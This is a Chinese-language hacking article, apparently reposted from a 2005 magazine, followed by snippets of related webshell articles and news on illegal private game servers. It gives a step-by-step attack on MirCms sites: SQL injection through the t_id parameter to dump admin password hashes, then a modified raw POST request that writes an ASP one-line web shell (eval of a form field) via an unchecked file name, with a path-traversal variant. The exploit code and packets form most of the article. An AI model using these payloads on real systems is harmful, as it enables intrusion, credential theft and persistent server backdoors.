进一步取得MirCms传奇私服的WebShell_漏洞研究

在黑防的2005年第6期中,小狮子写了关于MirCms中投票子系统的漏洞,阅读以后觉得该系统既然存在像登录验证错误这样的漏洞就应该还存在其他的可以更进一步利用的漏洞。本文就利用该系统中的这些漏洞取得其WebShell。 

一、取得管理员账号和密码。 

网站根目录下的yns_tupdata.asp中存在SQL注入漏洞,我们利用其可以获取管理员的账号和密码,看下面的代码片断。 

If (Request.QueryString("t_id") <> "") Then  

rst__MMColParam = Request.QueryString("t_id") 

End If 

…… 

rst.Source = "SELECT * FROM t_type WHERE t_id = " + Replace(rst__MMColParam, "'", "''") + "" 

变量t_id仅过滤了单引号就送到了SQL语句中,这样我们就可以使用 1 or 1=1的形式进行注入,打开NBSI输入注入地址http://xxx/yns_tupdata.asp?t_id=1 or 1=1,由于在网上就可以down到该系统的源代码,也就省去了我们猜表名和列名的过程,猜解以后我们就可以得到一些管理员的用户名和密码。 

由于密码是MD5加密的,而且后台还是Session验证,所以我们只能老老实实的去破解它的原始密码,至于破解MD5我们可以挂个常用密码的字典跑一遍,然后就看你的运气喽^_^这里我就得到了一个账号<如果云知道>的密码49ba59abbe56e057=〉123456,OK!就用这账号登录后台。(注:我们只需要得到level为1的账号就够用了,而且一般这种等级的账号密码比较简单^_^) 

二、进一步取得WebShell 

还是让我们先看一下yns_nadd_save.asp中的代码片断 

mm_path = server.MapPath((rst.Fields.Item("t_dir").Value)&"/"&(rsts.Fields.Item("ts_dir").Value)&"/" 

&request.Form("n_fpath")&"/"&request.Form("n_fname")) 

… 

Set fout = fso.CreateTextFile(mm_path) 

fout.WriteLine pencat 

fout.close 

程序从表单中取得n_fname后没有进行任何的扩展名检查就合成了mm_path变量,然后利用fso函数生成了以n_fname为文件名的文件,这样只要我们修改n_fname的值为 xxx.asp就可以很简单的在服务器上生成一个ASP木马,然后我们再看看这个文件的内容是怎么生成的, 

N_Title=Request.Form("n_title") 

… 

mm_template_path = server.MapPath("templates/type_template/type_son_template/detail_template.htm") 

… 

set fso_line = fso.opentextfile(mm_template_path,1,True)  

pencat=fso_line.readall 

end if 

pencat=replace(pencat,"t_title",n_title) 

从上面我们可以知道程序是将detail_template.htm中的内容读入,然后替换相关变量,最后得到生成文件的内容,这里我们就利用t_title这个替换变量来写入我们的ASP木马代码。我们来试一下,打开WinSock Expert在后台填加一篇文章,抓包内容如下: 

POST /yns_nadd_save.asp HTTP/1.1 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/ 

vnd.ms-powerpoint, application/msword, */* 

Referer: http://xxx/MirCMS_Add.asp 

Accept-Language: zh-cn 

Content-Type: application/x-www-form-urlencoded 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 

Host:xxx.net 

Content-Length:199 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF 

n_tid=52&n_tsid=56&n_sid=&n_title=test&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=20053151744366646.htm&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1 

这里我们将n_fname的值改成1.asp,然后将n_title的值改成我们常用的一句话木马,注意写入的ASP代码需要使用unicode编码以后的形式。<SCRIPT%20RUNAT=SERVER%20LANGUAGE= 

JAVASCRIPT>eval(Request.form('#')%2B'')</SCRIPT>,最后不要忘了重新计算封包的大小更改Content-Length的值,这部分知识在研究动网上传漏洞的时候想必大家都已经研究明白了吧,下面就直接给出我的修改结果。 

POST /yns_nadd_save.asp HTTP/1.1 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/ 

vnd.ms-powerpoint, application/msword, */* 

Referer: http://xxx/MirCMS_Add.asp 

Accept-Language: zh-cn 

Content-Type: application/x-www-form-urlencoded 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) 

Host:xxx.net 

Content-Length: 261 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF 

n_tid=52&n_tsid=56&n_sid=&n_title=<SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval(Request.form('#')%2B'')</SCRIPT>&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=1.asp&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1 

最后使用NC提交我们修改后的封包,到MirCMS_Html/xxx/年-月-日/下就可以找到我们的木马了,当然如果网站的管理员比较BT的话可能会设置MirCMS_Html目录下无法运行ASP文件,不过没有关系,我们只需把n_fname的值改成../../1.asp切换到根目录下就可以了,有了WebShell剩下的事情大家就可以看着办喽^_^ 

时间: 2024-11-02 19:03:25

进一步取得MirCms传奇私服的WebShell_漏洞研究的相关文章

轻松获得oblog 2.52的WebShell_漏洞研究

来源:邪恶八进制 作者:千寂孤城  一.方法   1.先进后台.利用CheckUserLogined漏洞直接加个后台管理员.关于这个CheckUserLogined漏洞我在<Blog的噩梦>(http://www.eviloctal.com/forum/htm_data/10/0508/13721.html)中有详细的说明,大概就是说可以通过Cookies欺骗搞SQL注入.   2.在后台的"网站信息配置"处有个"普通会员上传文件类型",给它加一个aaa

利用Session欺骗构造最隐蔽的WebShell_漏洞研究

不知不觉"LM团伙"看黑防已有两个春秋了,期期不落.潜心修炼了这么久,也能开始耍上一两招了.看了黑防第二期的<DreamWeaver引发网络危机>一文,"LM团伙"内心有说不出的激动,心想网上有40%的网页都有这样的漏洞,那岂不是又能收获N多肉鸡了.可是仔细研究发现,这个文章的方法存在一些问题,并不像想象中的那样容易发挥.下面就与大家一起讨论一下Session.  既然是谈Session欺骗,那么就先来看一下Session到底是什么,它是怎么工作的.在A

dvbbs7.1 照样从后台得到webshell_漏洞研究

文章作者:喜欢忧伤  信息来源:邪恶八进制安全小组  背景:  dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了  解决办法:  我把asp木马插入到数据库里,然后恢复.这样肯定检查肯定可以通过的.  具体过程:  前提:  (偶以默认的安装情况为准,具体情况的把握靠自己了.)  你得到论坛dvbbs7.1后台.  1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门]  同时已经修改名字成dvbbsToshell.gif

DVBBS7.1后台备份得到一个webshell_漏洞研究

转自:http://www.wrsky.com/read.php?tid=565 作者:firefox+lvhuana 今天上午上网的时候,非常无聊,好友都不在线. 正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求.然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么.... 想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细

教你利用Log备份获取Webshell_漏洞研究

Blog被人渗透了一下,不知道各位掉了什么东西没有.原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法--呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看.嗯,方法流出去无所谓,文章留着吧.  dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整

利用BBSxp后台的缺陷得到webshell_漏洞研究

遇一BBSXP后台: 查看源文件.也没有value可以自定义. 尝试修改上传类型. 无奈不支持php aspx. 向数据库里插入一句话再备份. 出现些XXX 估计表里加入了什么东.. 访问: /bbs/Admin_fso.asp?menu=files&dir=../ 可以看到整站文件.. 找到一个文件名不常见的后台.. 运气不错. 备份webshell之..

私自架起传奇私服,通过网络支付平台从中获利

卖毒品?走私?都不是,他们只是一款网络游戏的私服运营商. 昨日,这起被称为全国最大网络游戏私服类侵权案件在沈阳高新技术产业开发区人民法院开庭审理,庭审预计3天. 上海盛大网络发展有限公司是中国大陆唯一拥有热门网游<热血传奇>的网游运营公司,然而在盛大网络不知情的情况下,辽宁数家公司却私自架起传奇私服,通过网络支付平台从中获利. 作为盘锦久网通信网络有限公司.辽宁久网网络科技发展有限公司和盘锦新兴科技有限公司的总经理,被告人唐某2008年起在沈阳市和平区三好街百脑汇大厦招录了数十人,组织研发了四

传奇私服发布站网站优化经验谈

说起私服,每个网游运营商都深恶痛绝,就连国家新闻出版总署也曾下文"要像打击毒品犯罪一样去打击私服行为."然而网游私服凭借着众多玩家的追捧,在游戏运营商配合政府部门围.追.堵.截之下依旧"生机勃勃". 网游私服是未经版权拥有者授权,私自设立的网络服务器,其本质上属于网络盗版,因此私服自诞生之日起就属违法的性质.由于我国网络方面的法律法规并不完善,造成了私服制作商无人监管的局面,一些缺乏约束力的私服制作商俨然成为了此行业的"土皇帝",同行业的恶意争斗

夫妻架网刊登传奇私服广告 涉案金额近300万元

中介交易 SEO诊断淘宝客 站长团购 云主机 技术大厅 架网贩"私服"夫妻双双被抓获 自贡警方破获我省迄今为止涉案金额最大的网络侵犯著作权案 近日,一场没有硝烟的战斗,在虚拟的网络世界与现实的抓捕中进行着时空转换:警方电脑专家与非法"传奇私服"经营者在网络里斗智斗勇,打了一场侦破网络新型犯罪的漂亮仗.昨日,自贡市公安局网监支队披露了由省公安厅督办的 "5573侵犯网络著作权案"的侦破过程.据了解,该案涉及全国19个省.市和地区,目前共查扣涉案金额